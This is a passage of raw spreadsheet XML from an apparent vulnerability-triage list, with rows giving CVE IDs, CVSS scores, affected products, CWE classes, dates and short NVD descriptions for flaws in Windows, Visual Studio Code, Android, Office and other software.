r="T798" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81381</t></is></c></row><row r="799"><c r="A799" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B799" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C799" s="5" t="inlineStr"><is><t>CVE-2026-81790</t></is></c><c r="D799" s="5" t="n"><v>7.5</v></c><c r="E799" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F799" s="5" t="inlineStr"><is><t>audit@patchstack.com</t></is></c><c r="G799" s="5" t="inlineStr" /><c r="H799" s="5" t="n"><v>0.003</v></c><c r="I799" s="5" t="inlineStr" /><c r="J799" s="5" t="inlineStr" /><c r="K799" s="5" t="inlineStr" /><c r="L799" s="5" t="inlineStr" /><c r="M799" s="5" t="inlineStr" /><c r="N799" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O799" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P799" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q799" s="5" t="inlineStr" /><c r="R799" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S799" s="5" t="inlineStr"><is><t>Missing Authorization vulnerability in Viszt Péter Csomagpontok és szállítási címkék WooCommerce-hez allows Exploiting Incorrectly Configured Access Control Security Levels.

This issue affects Csomagpontok és szállítási címkék WooCommerce-hez: from n/a before 4.2.8.</t></is></c><c r="T799" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81790</t></is></c></row><row r="800"><c r="A800" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B800" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C800" s="5" t="inlineStr"><is><t>CVE-2026-83989</t></is></c><c r="D800" s="5" t="n"><v>7.5</v></c><c r="E800" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F800" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G800" s="5" t="inlineStr" /><c r="H800" s="5" t="n"><v>0.008999999999999999</v></c><c r="I800" s="5" t="inlineStr" /><c r="J800" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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0" s="5" t="inlineStr" /><c r="M800" s="5" t="inlineStr" /><c r="N800" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O800" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P800" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q800" s="5" t="inlineStr" /><c r="R800" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S800" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Services for NFS ONCRPC XDR Driver allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T800" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-83989</t></is></c></row><row r="801"><c r="A801" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B801" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C801" s="5" t="inlineStr"><is><t>CVE-2026-84001</t></is></c><c r="D801" s="5" t="n"><v>7.5</v></c><c r="E801" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F801" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G801" s="5" t="inlineStr" /><c r="H801" s="5" t="n"><v>0.006</v></c><c r="I801" s="5" t="inlineStr" /><c r="J801" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K8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1" s="5" t="inlineStr" /><c r="M801" s="5" t="inlineStr" /><c r="N801" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O801" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P801" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q801" s="5" t="inlineStr" /><c r="R801" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S801" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows Key Distribution Center allows an unauthorized attacker to deny service over a network.</t></is></c><c r="T801" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84001</t></is></c></row><row r="802"><c r="A802" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B802" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C802" s="5" t="inlineStr"><is><t>CVE-2026-85400</t></is></c><c r="D802" s="5" t="n"><v>7.5</v></c><c r="E802" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F802" s="5" t="inlineStr"><is><t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t></is></c><c r="G802" s="5" t="inlineStr" /><c r="H802" s="5" t="n"><v>0.004</v></c><c r="I802" s="5" t="inlineStr" /><c r="J802" s="5" t="inlineStr" /><c r="K802" s="5" t="inlineStr" /><c r="L802" s="5" t="inlineStr" /><c r="M802" s="5" t="inlineStr" /><c r="N802" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O802" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P802" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q802" s="5" t="inlineStr" /><c r="R802" s="5" t="inlineStr"><is><t>CWE-266, CWE-862</t></is></c><c r="S802" s="5" t="inlineStr"><is><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is></c><c r="T802" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85400</t></is></c></row><row r="803"><c r="A803" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B803" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C803" s="5" t="inlineStr"><is><t>CVE-2026-86075</t></is></c><c r="D803" s="5" t="n"><v>7.5</v></c><c r="E803" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F803" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G803" s="5" t="inlineStr" /><c r="H803" s="5" t="n"><v>0.003</v></c><c r="I803" s="5" t="inlineStr" /><c r="J803" s="5" t="inlineStr" /><c r="K803" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L803" s="5" t="inlineStr" /><c r="M803" s="5" t="inlineStr" /><c r="N803" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O803" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P803" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q803" s="5" t="inlineStr" /><c r="R803" s="5" t="inlineStr"><is><t>CWE-770</t></is></c><c r="S803" s="5" t="inlineStr"><is><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is></c><c r="T803" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86075</t></is></c></row><row r="804"><c r="A804" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B804" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C804" s="5" t="inlineStr"><is><t>CVE-2026-86711</t></is></c><c r="D804" s="5" t="n"><v>7.5</v></c><c r="E804" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F804" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G804" s="5" t="inlineStr" /><c r="H804" s="5" t="n"><v>0.001</v></c><c r="I804" s="5" t="inlineStr" /><c r="J804" s="5" t="inlineStr" /><c r="K804" s="5" t="inlineStr" /><c r="L804" s="5" t="inlineStr" /><c r="M804" s="5" t="inlineStr" /><c r="N804" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O804" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P804" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q804" s="5" t="inlineStr" /><c r="R804" s="5" t="inlineStr"><is><t>CWE-749</t></is></c><c r="S804" s="5" t="inlineStr"><is><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is></c><c r="T804" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86711</t></is></c></row><row r="805"><c r="A805" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B805" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C805" s="5" t="inlineStr"><is><t>CVE-2026-86721</t></is></c><c r="D805" s="5" t="n"><v>7.5</v></c><c r="E805" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F805" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G805" s="5" t="inlineStr" /><c r="H805" s="5" t="n"><v>0.003</v></c><c r="I805" s="5" t="inlineStr" /><c r="J805" s="5" t="inlineStr" /><c r="K805" s="5" t="inlineStr" /><c r="L805" s="5" t="inlineStr" /><c r="M805" s="5" t="inlineStr" /><c r="N805" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O805" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P805" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q805" s="5" t="inlineStr" /><c r="R805" s="5" t="inlineStr"><is><t>CWE-287</t></is></c><c r="S805" s="5" t="inlineStr"><is><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is></c><c r="T805" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86721</t></is></c></row><row r="806"><c r="A806" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B806" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C806" s="5" t="inlineStr"><is><t>CVE-2026-86728</t></is></c><c r="D806" s="5" t="n"><v>7.5</v></c><c r="E806" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F806" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G806" s="5" t="inlineStr" /><c r="H806" s="5" t="n"><v>0.003</v></c><c r="I806" s="5" t="inlineStr" /><c r="J806" s="5" t="inlineStr" /><c r="K806" s="5" t="inlineStr" /><c r="L806" s="5" t="inlineStr" /><c r="M806" s="5" t="inlineStr" /><c r="N806" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O806" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P806" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q806" s="5" t="inlineStr" /><c r="R806" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="S806" s="5" t="inlineStr"><is><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is></c><c r="T806" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86728</t></is></c></row><row r="807"><c r="A807" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B807" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C807" s="5" t="inlineStr"><is><t>CVE-2026-19651</t></is></c><c r="D807" s="5" t="n"><v>7.4</v></c><c r="E807" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F807" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G807" s="5" t="inlineStr" /><c r="H807" s="5" t="n"><v>0.003</v></c><c r="I807" s="5" t="inlineStr" /><c r="J807" s="5" t="inlineStr" /><c r="K807" s="5" t="inlineStr" /><c r="L807" s="5" t="inlineStr" /><c r="M807" s="5" t="inlineStr" /><c r="N807" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O807" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P807" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q807" s="5" t="inlineStr" /><c r="R807" s="5" t="inlineStr"><is><t>CWE-639</t></is></c><c r="S807" s="5" t="inlineStr"><is><t>IBM Enterprise Build of Quarkus 3.27.1 through 3.27.5, and 3.33.1 through 3.33.3  could allow an attacker to bypass authorization by manipulating URL query parameters due to incorrect mapping of values to untrusted query string input.</t></is></c><c r="T807" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19651</t></is></c></row><row r="808"><c r="A808" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B808" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C808" s="5" t="inlineStr"><is><t>CVE-2026-69347</t></is></c><c r="D808" s="5" t="n"><v>7.4</v></c><c r="E808" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F808" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G808" s="5" t="inlineStr" /><c r="H808" s="5" t="n"><v>0.003</v></c><c r="I808" s="5" t="inlineStr" /><c r="J808" s="5" t="inlineStr" /><c r="K808" s="5" t="inlineStr" /><c r="L808" s="5" t="inlineStr" /><c r="M808" s="5" t="inlineStr" /><c r="N808" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O808" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P808" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q808" s="5" t="inlineStr" /><c r="R808" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S808" s="5" t="inlineStr"><is><t>Heap-based</t></is></c><c r="T808" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69347</t></is></c></row><row r="809"><c r="A809" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B809" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C809" s="5" t="inlineStr"><is><t>CVE-2026-71375</t></is></c><c r="D809" s="5" t="n"><v>7.4</v></c><c r="E809" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F809" s="5" t="inlineStr"><is><t>hirt@hitachi.co.jp</t></is></c><c r="G809" s="5" t="inlineStr" /><c r="H809" s="5" t="n"><v>0.002</v></c><c r="I809" s="5" t="inlineStr" /><c r="J809" s="5" t="inlineStr" /><c r="K809" s="5" t="inlineStr" /><c r="L809" s="5" t="inlineStr" /><c r="M809" s="5" t="inlineStr" /><c r="N809" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O809" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P809" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q809" s="5" t="inlineStr" /><c r="R809" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S809" s="5" t="inlineStr"><is><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809" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71375</t></is></c></row><row r="810"><c r="A810" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B810" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C810" s="5" t="inlineStr"><is><t>CVE-2026-76196</t></is></c><c r="D810" s="5" t="n"><v>7.4</v></c><c r="E810" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F810" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G810" s="5" t="inlineStr" /><c r="H810" s="5" t="n"><v>0.002</v></c><c r="I810" s="5" t="inlineStr" /><c r="J810" s="5" t="inlineStr" /><c r="K810" s="5" t="inlineStr"><is><t>adobe:photoshop_mobile</t></is></c><c r="L810" s="5" t="inlineStr" /><c r="M810" s="5" t="inlineStr" /><c r="N810" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O810" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P810" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q810" s="5" t="inlineStr" /><c r="R810" s="5" t="inlineStr"><is><t>CWE-384</t></is></c><c r="S810" s="5" t="inlineStr"><is><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is></c><c r="T810" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-76196</t></is></c></row><row r="811"><c r="A811" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B811" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C811" s="5" t="inlineStr"><is><t>CVE-2026-78461</t></is></c><c r="D811" s="5" t="n"><v>7.4</v></c><c r="E811" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F811" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G811" s="5" t="inlineStr" /><c r="H811" s="5" t="n"><v>0.01</v></c><c r="I811" s="5" t="inlineStr" /><c r="J811" s="5" t="inlineStr" /><c r="K811" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L811" s="5" t="inlineStr" /><c r="M811" s="5" t="inlineStr" /><c r="N811" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O811" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P811" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q811" s="5" t="inlineStr" /><c r="R811" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="S811" s="5" t="inlineStr"><is><t>Improper limitation of a pathname to a restricted directory ('path traversal') in Visual Studio Code allows an unauthorized attacker to bypass a security feature over a network.</t></is></c><c r="T811" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78461</t></is></c></row><row r="812"><c r="A812" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B812" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C812" s="5" t="inlineStr"><is><t>CVE-2026-81383</t></is></c><c r="D812" s="5" t="n"><v>7.4</v></c><c r="E812" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F812" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G812" s="5" t="inlineStr" /><c r="H812" s="5" t="n"><v>0.007</v></c><c r="I812" s="5" t="inlineStr" /><c r="J812" s="5" t="inlineStr" /><c r="K812" s="5" t="inlineStr"><is><t>microsoft:visual_studio_code</t></is></c><c r="L812" s="5" t="inlineStr" /><c r="M812" s="5" t="inlineStr" /><c r="N812" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O812" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P812" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q812" s="5" t="inlineStr" /><c r="R812" s="5" t="inlineStr"><is><t>CWE-706</t></is></c><c r="S812" s="5" t="inlineStr"><is><t>Use of incorrectly-resolved name or reference in Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T812" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81383</t></is></c></row><row r="813"><c r="A813" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B813" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C813" s="5" t="inlineStr"><is><t>CVE-2026-84003</t></is></c><c r="D813" s="5" t="n"><v>7.4</v></c><c r="E813" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F813" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G813" s="5" t="inlineStr" /><c r="H813" s="5" t="n"><v>0.004</v></c><c r="I813" s="5" t="inlineStr" /><c r="J813" s="5" t="inlineStr" /><c r="K813" s="5" t="inlineStr"><is><t>microsoft:azure\/msal-node</t></is></c><c r="L813" s="5" t="inlineStr" /><c r="M813" s="5" t="inlineStr" /><c r="N813" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O813" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P813" s="5" t="inlineStr"><is><t>2026-09-16</t></is></c><c r="Q813" s="5" t="inlineStr" /><c r="R813" s="5" t="inlineStr"><is><t>CWE-294</t></is></c><c r="S813" s="5" t="inlineStr"><is><t>Authentication bypass by capture-replay in Microsoft Authentication Library (MSAL) for Node.js allows an unauthorized attacker to perform spoofing over a network.</t></is></c><c r="T813" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84003</t></is></c></row><row r="814"><c r="A814" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B814" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C814" s="5" t="inlineStr"><is><t>CVE-2026-28613</t></is></c><c r="D814" s="5" t="n"><v>7.3</v></c><c r="E814" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F814" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G814" s="5" t="inlineStr" /><c r="H814" s="5" t="n"><v>0.001</v></c><c r="I814" s="5" t="inlineStr" /><c r="J814" s="5" t="inlineStr" /><c r="K814" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L814" s="5" t="inlineStr" /><c r="M814" s="5" t="inlineStr" /><c r="N814" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O814" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P814" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q814" s="5" t="inlineStr" /><c r="R814" s="5" t="inlineStr"><is><t>CWE-20</t></is></c><c r="S814" s="5" t="inlineStr"><is><t>In initAppLinkTypeAndIntent of ChannelImpl.java, there is a possible launch an arbitrary intent due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T814" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28613</t></is></c></row><row r="815"><c r="A815" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B815" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C815" s="5" t="inlineStr"><is><t>CVE-2026-28626</t></is></c><c r="D815" s="5" t="n"><v>7.3</v></c><c r="E815" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F815" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G815" s="5" t="inlineStr" /><c r="H815" s="5" t="n"><v>0.001</v></c><c r="I815" s="5" t="inlineStr" /><c r="J815" s="5" t="inlineStr" /><c r="K815" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L815" s="5" t="inlineStr" /><c r="M815" s="5" t="inlineStr" /><c r="N815" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O815" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P815" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q815" s="5" t="inlineStr" /><c r="R815" s="5" t="inlineStr"><is><t>CWE-601</t></is></c><c r="S815" s="5" t="inlineStr"><is><t>In onCreate of SetupPassthroughActivity.java, there is a possible way to launch arbitrary activity due to Intent redirection . This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T815" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28626</t></is></c></row><row r="816"><c r="A816" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B816" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C816" s="5" t="inlineStr"><is><t>CVE-2026-28656</t></is></c><c r="D816" s="5" t="n"><v>7.3</v></c><c r="E816" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F816" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G816" s="5" t="inlineStr" /><c r="H816" s="5" t="n"><v>0.001</v></c><c r="I816" s="5" t="inlineStr" /><c r="J816" s="5" t="inlineStr" /><c r="K816" s="5" t="inlineStr"><is><t>google:android</t></is></c><c r="L816" s="5" t="inlineStr" /><c r="M816" s="5" t="inlineStr" /><c r="N816" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O816" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P816" s="5" t="inlineStr"><is><t>2026-09-15</t></is></c><c r="Q816" s="5" t="inlineStr" /><c r="R816" s="5" t="inlineStr"><is><t>CWE-1021</t></is></c><c r="S816" s="5" t="inlineStr"><is><t>In multiple functions of DeviceAdminAdd.java, there is a possible way to an overlay due to a tapjacking/overlay attack. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T816" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-28656</t></is></c></row><row r="817"><c r="A817" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B817" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C817" s="5" t="inlineStr"><is><t>CVE-2026-45528</t></is></c><c r="D817" s="5" t="n"><v>7.3</v></c><c r="E817" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F817" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G817" s="5" t="inlineStr" /><c r="H817" s="5" t="n"><v>0.001</v></c><c r="I817" s="5" t="inlineStr" /><c r="J817" s="5" t="inlineStr" /><c r="K817" s="5" t="inlineStr" /><c r="L817" s="5" t="inlineStr" /><c r="M817" s="5" t="inlineStr" /><c r="N817" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O817" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P817" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q817" s="5" t="inlineStr" /><c r="R817" s="5" t="inlineStr"><is><t>CWE-926</t></is></c><c r="S817" s="5" t="inlineStr"><is><t>In getManageSpaceActivityIntent of StorageManagerService.java, there is a possible LaunchAnyWhere chain due to an unsafe PendingIntent. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is needed for exploitation.</t></is></c><c r="T817" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45528</t></is></c></row><row r="818"><c r="A818" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B818" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C818" s="5" t="inlineStr"><is><t>CVE-2026-69477</t></is></c><c r="D818" s="5" t="n"><v>7.3</v></c><c r="E818" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F818" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G818" s="5" t="inlineStr" /><c r="H818" s="5" t="n"><v>0.004</v></c><c r="I818" s="5" t="inlineStr" /><c r="J818" s="5" t="inlineStr" /><c r="K818" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:access, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L818" s="5" t="inlineStr" /><c r="M818" s="5" t="inlineStr" /><c r="N818" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O818" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P818" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q818" s="5" t="inlineStr" /><c r="R818" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S818" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Microsoft Office Access allows an authorized attacker to execute code locally.</t></is></c><c r="T818" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69477</t></is></c></row><row r="819"><c r="A819" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B819" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C819" s="5" t="inlineStr"><is><t>CVE-2026-78627</t></is></c><c r="D819" s="5" t="n"><v>7.3</v></c><c r="E819" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F819" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G819" s="5" t="inlineStr" /><c r="H819" s="5" t="n"><v>0.001</v></c><c r="I819" s="5" t="inlineStr" /><c r="J819" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K819" s="5" t="inlineStr" /><c r="L819" s="5" t="inlineStr" /><c r="M819" s="5" t="inlineStr" /><c r="N819" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O819" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P819" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q819" s="5" t="inlineStr" /><c r="R819" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S819" s="5" t="inlineStr"><is><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is></c><c r="T819" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78627</t></is></c></row><row r="820"><c r="A820" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B820" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C820" s="5" t="inlineStr"><is><t>CVE-2026-86806</t></is></c><c r="D820" s="5" t="n"><v>7.3</v></c><c r="E820" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F820" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G820" s="5" t="inlineStr" /><c r="H820" s="5" t="n"><v>0.005</v></c><c r="I820" s="5" t="inlineStr" /><c r="J820" s="5" t="inlineStr" /><c r="K820" s="5" t="inlineStr" /><c r="L820" s="5" t="inlineStr" /><c r="M820" s="5" t="inlineStr" /><c r="N820" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O820" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P820" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q820" s="5" t="inlineStr" /><c r="R820" s="5" t="inlineStr"><is><t>CWE-918</t></is></c><c r="S820" s="5" t="inlineStr"><is><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is></c><c r="T820" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86806</t></is></c></row><row r="821"><c r="A821" s="5" t="inlineStr"><is><t>P3 - Medium</t></is></c><c r="B821" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C821" s="5" t="inlineStr"><is><t>CVE-2026-76561</t></is></c><c r="D821" s="5" t="n"><v>7.2</v></c><c r="E821" s="5" t="inlineStr"><is><t>HIGH</t></is></c><c r="F821" s="5" t="inlineStr"><is><t>secalert@redhat.com</t></is></c><c r="G821" s="5" t="inlineStr" /><c r="H821" s="5" t="n"><v>0.006</v></c><c r="I821" s="5" t="inlineStr" /><c r="J821" s="5" t="inlineStr" /><c r="K821" s="5" t="inlineStr" /><c r="L821" s="5" t="inlineStr" /><c r="M821" s="5" t="inlineStr" /><c r="N821" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O821" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P821" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q821" s="5" t="inlineStr" /><c r="R821" 